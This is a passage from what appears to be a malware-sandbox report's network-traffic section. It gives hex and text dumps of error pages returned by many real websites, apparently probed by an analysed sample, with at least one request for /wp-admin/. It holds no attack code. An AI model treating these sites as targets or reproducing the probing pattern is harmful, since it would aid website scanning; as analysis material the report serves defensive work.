62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 0a 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 0a 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems. Please try again later.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheContent-Length: 207Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 70 2d 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wp-admin/ was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://hmichaelandco.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:34 GMTserver: LiteSpeedData Raw: 32 66 39 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 36 b2 e8 67 b9 ea fc 07 0c 9d 58 d2 2c 49 51 2f 3f 64 cb 39 93 d9 64 93 53 c9 26 37 93 9c ad 5b 93 39 2a 88 84 24 cc 50 04 97 80 64 7b 3d fe 41 f7 6f dc 5f 76 ab f1 20 41 8a 7a f8 91 9c f3 e1 2a 95 31 09 02 dd 8d 46 a3 d1 00 ba 81 ab 57 11 0b c5 5d 4a d0 42 2c e3 eb a3 2b f8 83 62 9c cc c7 0e 49 bc df de 39 47 8d 34 23 33 7a 3b 76 d8 7c 84 16 42 a4 7c d4 e9 b0 79 ea 2f 49 27 e1 c7 0e 82 52 04 47 d7 47 57 4b 22 b0 cc e2 91 7f ae e8 7a ec bc 65 89 20 89 f0 7e bd 4b 89 83 42 f5 36 76 04 b9 15 1d c0 74 89 c2 05 ce 38 11 e3 df 7e fd d6 3b 77 50 e7 fa e8 e8 ea 95 e7 a1 1f d9 94 c6 04 bd 4b 49 48 67 34 44 3f 12 81 39 3a 41 df e2 35 0d 59 c2 91 e7 19 84 09 5e 92 b1 b3 a6 e4 26 65 99 b0 d0 dc d0 48 2c c6 11 59 d3 90 78 f2 c5 45 34 a1 82 e2 d8 e3 21 8e c9 b8 eb a2 25 be a5 cb d5 b2 48 58 71 92 c9 37 3c 8d c9 38 70 ae af 62 9a 7c 42 19 89 c7 0e 5f b0 4c 84 2b 81 80 06 07 2d 32 32 1b 3b c0 93 51 a7 b3 58 d2 70 81 49 8c 93 28 64 7e c8 96 9d 9b d4 d3 55 ee ac d2 98 e1 88 77 7a 41 2f e8 04 a7 79 66 3f 4d e6 25 0c 38 4d 63 e2 09 b6 0a 17 de 9f 88 84 d3 7f 11 3e 76 ba bd e0 b6 db 0b fe a4 9a 69 a4 67 a7 b7 67 a7 7f 2e ca ee b0 77 db 1d f6 5e 10 29 c8 ec 3f 58 16 fd 9c 11 ce d1 3b b1 9a cd a4 88 a2 2d bf 2b 1e 66 34 15 d7 47 5b be cb e4 ce 6b f4 bf d9 0a 85 38 41 38 8a d0 92 65 04 3a d1 8c ce 57 19 16 94 25 88 a5 f0 87 23 c1 d0 0d 99 ce 58 22 40 ce 48 86 a6 77 28 cd c8 9a b2 15 8f ef 50 44 66 34 a1 c9 1c 89 05 41 ff 20 d3 6f 59 22 de 4a 40 e8 86 8a 05 ba 63 ab 2c 87 f5 ba b3 93 28 3a 43 2d 04 2a 83 cd 2a a0 c6 e3 31 72 56 89 44 46 22 07 b5 d1 fd 4e 48 50 c7 32 31 63 94 90 1b f4 d3 f4 23 09 45 ab 7d b9 b3 f4 c3 ce af 25 b8 ef 9b 73 c6 e6 31 69 7e 40 63 74 3f c3 4b 1a 53 c2 47 e8 7d f3 47 96 08 4e b2 0c 8b 51 37 08 dc 5e 10 b8 fd 20 70 07 41 e0 0e 83 c0 3d 0d 02 f7 2c 08 dc f3 20 70 2f 82 c0 ed 06 01 15 38 a6 21 e4 d4 4f fd fc 69 90 3f 0d f3 a7 d3 fc e9 2c 7f 3a cf 9f 2e cc 53 d3 45 cd 9f 52 92 fc e5 1d 4e f8 c8 90 60 a3 af 43 b3 13 f8 09 5f 4d 41 b3 c6 58 d0 a4 f9 e1 e1 f2 68 27 c3 5a b3 55 12 82 30 b5 0e 69 b6 35 ce d0 cd 0c 8d 51 c4 c2 d5 92 24 c2 0f 33 82 05 f9 26 26 f0 d6 42 4d 25 df 4d b4 a7 15 41 06 6e 66 3e cf 42 34 46 4d 33 bc e0 8f f8 d6 57 6d 86 53 ca a5 36 85 b4 4e 4c a7 bc a3 25 bd d3 f5 87 7e df bc f9 1f 79 73 b7 c0 68 54 72 b4 1b a3 a6 1c 84 3e e2 35 d6 94 1e 54 18 f3 bb 44 52 2a b2 15 39 00 1f f0 89 db 6c 9a 13 a1 79 c4 bf be fb 15 cf ff 8e 97 c4 e6 d6 fb e0 c3 7e 42 b8 9f e2 8c 24 e2 ef 2c 22 3e 4d 38 c9 c4 d7 64 c6 32 d2 42 37 33 Data Ascii: 2f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:06 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 34 8c 4d 07 f9 88 24 88 c4 94 c1 11 d3 9a 92 40 8b b4 68 fc f7 52 58 1c ef bb e7 9d 5c ba 4b af 09 bf d7 19 9c f9 a5 84 ba 39 95 45 02 c1 1e b1 c8 78 8e 98 f2 74 6b 8e 61 84 98 55 01 23 54 b9 a1 67 54 c9 56 2c c1 75 ae 97 2c 8e 62 a8 8c 83 dc cc 5a 50 dc 8e 84 e2 0a d1 87 11 5f ff 77 60 7f cc 92 08 1d 19 57 12 26 f9 9a a5 75 52 40 73 2b 01 5b 31 74 1a 3e ad 05 bd e0 4f 8f 83 d1 e0 54 67 c1 ca e9 2d a7 90 e2 e8 f5 ab 78 51 f9 41 e4 07 03 db dd c9 cb 00 00 00 Data Ascii: M=0E'<4M$@hRX\K9ExtkaU#TgTV,u,bZP_w`W&uR@s+[1t>OTg-xQA
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheLast-Modified: Thu, 24 Oct 2019 19:33:13 GMTETag: "1e8-595ad1aad5040"Accept-Ranges: bytesContent-Length: 488Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 41 72 69 61 6c 22 20 73 69 7a 65 3d 22 33 22 3e 45 72 72 6f 20 34 30 34 3c 2f 66 6f 6e 74 3e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 4d 53 20 53 61 6e 73 20 53 65 72 69 66 22 20 73 69 7a 65 3d 22 32 22 3e 50 e1 67 69 6e 61 20 6e e3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Pgina No Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Pgina no encontrada</font></p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lumaruniformes.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 13939Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 b2 db 76 e3 c6 96 25 fa 9c fa 0a 24 7c 9c 12 bd 89 1b 6f 92 28 51 1e de be d4 71 1f df da 69 d7 ae 3e 96 07 47 00 58 00 22 15 88 80 23 02 a4 98 da fa 97 d3 8f f5 d0 0f 3d ea 0f da 3f 76 16 2e 24 41 12 90 94 99 ca 5d bb 7c 11 03 eb 32 d7 5c 73 cd cb 97 a1 08 f4 2a 03 23 d1 29 bb 3a ba 2c 7e 0c 46 78 3c 33 41 59 df ff 9b 59 c4 80 84 57 47 2f 2e 53 d0 c4 08 12 22 15 e8 99 f9 eb 2f df 58 67 e6 26 ce 49 0a 33 73 41 61 99 09 a9 4d 23 10 5c 03 c7 ba 25 0d 75 32 0b 61 41 03 b0 ca 8f be 41 39 d5 94 30 4b 05 84 c1 cc 2b 51 18 e5 37 86 04 36 33 33 29 22 ca c0 34 12 09 d1 cc 4c b4 ce d4 d4 71 e2 34 8b 6d 21 63 e7 36 e2 8e 57 35 69 aa 19 5c fd 20 0c 05 06 f0 62 a6 fc f3 3f 90 bf 91 fd f9 3f 63 ca 89 f1 ea 93 b3 81 e7 5d 18 df e5 29 91 c6 af 9c 46 42 a6 a0 2e 9d aa f3 a8 41 fe 58 0a 5f 68 75 bc a1 7e 9c 92 5b 8b a6 24 06 2b 93 50 ac 36 65 44 c6 70 6c 38 d8 b8 e5 4b 98 06 c9 89 46 c6 85 94 18 c8 32 46 03 a2 a9 e0 8e 54 ea 2f b7 29 c3 54 31 70 66 ee 11 31 5e 49 f2 47 2e 2e 8c 6f 00 c2 fd 8d 59 51 9b af 4b ed 40 a4 4e 84 65 8e f9 31 08 fc fc fa b5 11 82 c1 84 42 01 52 dc 9f 48 2a d4 13 28 e1 ff 45 b9 6a 72 53 81 a4 99 be 3a 5a 52 1e 8a a5 3d 5f 66 90 8a 37 f4 35 68 4d 79 ac 8c 99 71 67 fa 44 c1 af 92 99 d3 1a fc da b9 76 94 bd 2c 4e 7c ed 94 b2 ab 6b 04 97 70 ed 94 cd d7 8e 37 b2 5d db bd 76 4e 07 b7 a7 83 6b c7 ec 9b 70 ab b1 df ce 78 8c 1f 6a 11 bf 1f 1e 36 96 68 f8 fb 75 05 88 af e2 5b e4 32 00 73 7a 67 a2 25 50 ce b2 ad c6 2f e1 0f d5 b8 76 96 99 45 79 c0 f2 b0 18 f7 46 95 81 b2 d1 c2 5b 01 ee 6c a7 94 db 6f d4 e7 0b 90 b3 89 3d b2 3d f3 fe fe e2 c8 f9 ec a5 f1 4b 42 95 11 51 06 06 fe 92 5c 0b 2b 06 0e 12 07 87 c6 67 ce d1 cb 28 e7 41 71 d3 13 da e7 bd bb 05 9e 51 f4 55 1f 2e d6 71 23 38 81 de 9d 96 ab 32 a7 67 77 2a cf 32 21 f5 2f a0 b4 9a 42 5f 53 64 a9 49 9a 4d 4f 38 2c 8d af 10 b8 67 2f 08 cb e1 c7 e8 a4 77 7f a1 40 29 84 79 ad 85 44 b5 6c 05 fa 5b dc f9 44 f4 ff db eb 1f 7f b0 95 96 78 3b 1a ad 4e 74 af 77 8f 72 04 49 31 ee fe 7e 33 3e 3b c1 19 05 35 b0 03 5c 55 fe 0c 81 3e 71 fb 6e 1f bf 09 5f 10 bc 06 0d 75 b2 fd 4c 80 c6 89 ee 61 00 b7 66 bf e0 35 4f 34 96 bb bd 8b 6a 81 82 e5 af 94 eb e1 e0 0b 29 c9 ea 04 ec 18 39 15 a7 44 ee e4 29 d0 76 88 85 bd be 9c 9d 7c 00 27 5e 72 ea 3f 17 9b de 85 04 9d 4b 6e 68 1b d0 04 ab 93 cd 5d 51 be de 5d 9d 84 d9 6c 26 7f d3 bf df f7 b6 02 e7 6b 81 d5 92 16 f2 63 75 80 8e 32 23 46 62 73 5a 37 16 30 e6 75 1e 9e 0d 03 fc 1b 45 c3 eb 3c 02 37 ba ce 07 ae 1b e2 df 09 39 ad 22 66 67 99 bf 53 d6 fb fc a5 37 7d b9 0b 1b 46 a4 f1 1e 9a fb a9 0a a4 51 d0 7b f5 ea e5 3e b3 11 fe f5 47 2e fe 0d 26 a7 8d f7
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Sucuri/CloudproxyDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14013X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=e07b21aaadc733c471861fff8037d281; path=/Vary: Accept-EncodingX-Sucuri-Cache: MISSData Raw: 31 35 33 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 0a 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 36 33 33 33 35 34 37 34 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 36 33 33 33 35 34 37 34 30 22 20 2f 3e 0a 0a 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 74 68 65 6d 65 73 2f 61 6d 61 7a 6f 6e 61 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 74 68 65 6d 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 74 68 65 6d 65 73 2f 61 6d 61 7a 6f 6e 61 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 71 75 69 63 6b 2d 6f 72 64 65 Data Ascii: 1532<!doctype html><html lang="en"> <head> <meta charset="utf-8"><meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://samson.pe/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:35 GMTserver: LiteSpeedData Raw: 32 32 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 5b 77 db 38 92 f0 b3 7d ce fc 07 84 39 b1 a5 6e de 25 f9 22 5b ea 71 d2 9e de ec a6 3b 99 38 d9 39 bb 49 4e 0e 44 42 12 12 92 60 03 a0 65 b5 5b 3f 66 1f f7 79 df f6 b5 ff d8 9e 02 78 13 4d c9 8e ed 9e ef cb 4c cb 24 50 a8 2a 14 aa 0a f7 e2 e9 93 90 05 72 99 12 34 97 71 34 de 3d 85 3f 28 c2 c9 6c 64 10 61 bd 39 37 20 8d e0 70 bc bb 73 1a 13 89 51 30 c7 5c 10 39 32 de bf fb 9b 75 64 94 e9 09 8e c9 c8 b8 a4 64 91 32 2e 0d 14 b0 44 92 44 8e 8c 05 0d e5 7c 14 92 4b 1a 10 4b bd 98 88 26 54 52 1c 59 22 c0 11 19 79 0a 4b 44 93 af 88 93 68 64 a4 9c 4d 69 44 0c 34 e7 64 3a 32 e6 52 a6 62 e8 38 b3 38 9d d9 8c cf 9c ab 69 e2 78 50 a8 e0 49 d1 de e7 6c c2 a4 d8 2f 29 ef 27 8c 26 21 b9 32 d1 94 45 11 5b ec 23 47 15 79 62 59 e8 dd 9c 0a 24 a8 24 88 0a c4 52 49 63 fa 1b 09 d1 82 ca 39 92 73 82 fe 83 61 21 d1 c5 f9 6b 94 46 d9 8c 26 e8 d2 f7 ec 01 b2 50 c1 cc 12 00 ec 80 c5 ce 82 f1 30 e5 44 08 47 83 0a 47 10 e6 20 cb 02 d1 48 2a 23 32 7e f3 c7 7f cd 68 82 51 c2 10 49 40 30 1c 87 18 59 e8 02 c7 82 25 e8 05 a4 b0 48 a0 37 84 ff f1 bf a7 8e 2e 54 54 2e e5 2c 25 5c 2e 47 06 9b 0d 23 06 12 ab 49 97 88 cf e7 17 06 d4 2c 6f 9f 35 70 85 a9 06 fd 4d 8c 6c c4 0a 72 fb 0c 32 af 61 6e ad 4a 8e 41 04 9c a6 12 81 9a 8d 0c 9c a6 11 0d b0 a4 2c 71 a2 f0 fb 2f 82 25 06 0a 22 2c c4 c8 50 42 b5 44 30 27 31 b6 66 1c a7 73 63 7c 6d fc 55 a9 d2 95 34 86 a5 2a 68 10 50 06 c3 34 fe aa 21 87 1f ae 8d bf 02 0d 63 68 fc 83 4c 2e a8 24 90 49 c3 7a 39 25 70 3b 25 ce d3 05 99 40 3d 0c d3 c8 78 d4 0a 62 98 86 aa e4 d0 68 af 9c 69 84 44 57 8d b2 c4 18 1a 86 69 a4 d9 24 a2 62 4e b8 31 bc de 4c 9a f1 19 4e e8 6f 4a 06 c6 ca 34 52 06 96 42 71 74 16 80 58 8c 7a 4d 2e 08 e6 c1 3c cf 30 0d 89 f9 8c 48 85 3d af ea 79 22 f9 f2 0d a3 89 d4 55 79 47 e2 34 c2 12 a4 50 e8 aa 28 6b fd 83 18 5d 0b 85 f1 b3 24 3c fe 2c 24 a7 c9 6c 05 4c fc 9a 11 be b4 68 92 66 20 68 4e 7e cd 28 27 21 52 a6 75 b3 88 b1 fa 64 1a 34 79 85 93 59 86 67 40 4c 7b 8b 95 59 35 c2 eb 7a 35 b7 b4 c4 9a 38 6e 95 f9 96 d6 8a d8 8c d5 45 f3 32 c6 33 f2 7a f2 85 04 20 9b 16 6e b7 30 e5 68 15 73 00 a7 43 01 91 b3 45 55 16 a9 95 fb 3b 27 4b 23 86 43 e1 f8 ae ef 3b ee 81 42 60 15 2d 90 80 be e6 90 ef 37 a8 dd 37 e1 52 fe d4 18 1e bb a6 31 27 74 36 97 fa 39 c0 a9 d6 a4 0d aa bb 32 0d 55 a7 ad 6a da 26 82 95 69 08 1c 93 33 61 0c 3f 94 fa b5 58 2c ec 25 cb 64 36 21 ca 23 66 82 70 e7 e2 ec e7 8b d7 bf fc f4 f6 f5 fb 37 c6 a7 d5 a7 d5 a9 a3 6d 05 1c 15 78 60 e7 86 8f b5 95 cf dc dd 3d 2d 7b 82 fd 30 11 56 ca c9 94 c8 60 be af bb 83 7d c7 01 7a 33 c6 66 11 91
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:35 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 